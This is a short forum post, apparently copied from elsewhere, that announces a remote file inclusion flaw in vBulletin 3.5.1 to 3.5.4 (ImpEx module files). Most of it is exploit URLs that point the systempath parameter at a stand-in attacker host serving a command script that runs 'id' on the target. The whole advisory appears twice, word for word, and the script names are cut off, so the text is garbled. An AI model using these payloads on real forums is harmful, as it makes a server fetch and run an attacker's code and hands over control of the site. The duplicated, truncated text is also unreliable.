I came across this on the internet...
Remote File Inclusion in VBulletin
version :
VBulletin 3.5.1
VBulletin 3.5.2
VBulletin 3.5.4
The bug reside in :
ImpExModule.php
ImpExController.php
ImpExDisplay.php
Exploit :
(1)
http://www.site.com/forum/impex/ImpE...hp?systempath=
class="fixed">http://www.host_evil.com/cmd?&=id
(2)
http://www.site.com/forum/impex/ImpE...hp?systempath=
class="fixed">http://www.host_evil.com/cmd?&=id
(3)
http://www.site.com/forum/impex/ImpE...hp?systempath=
class="fixed">http://www.host_evil.com/cmd?&=id
Remote File Inclusion in VBulletin
version :
VBulletin 3.5.1
VBulletin 3.5.2
VBulletin 3.5.4
The bug reside in :
ImpExModule.php
ImpExController.php
ImpExDisplay.php
Exploit :
(1)
http://www.site.com/forum/impex/ImpE...hp?systempath=
class="fixed">http://www.host_evil.com/cmd?&=id
(2)
http://www.site.com/forum/impex/ImpE...hp?systempath=
class="fixed">http://www.host_evil.com/cmd?&=id
(3)
http://www.site.com/forum/impex/ImpE...hp?systempath=
class="fixed">http://www.host_evil.com/cmd?&=id
Comment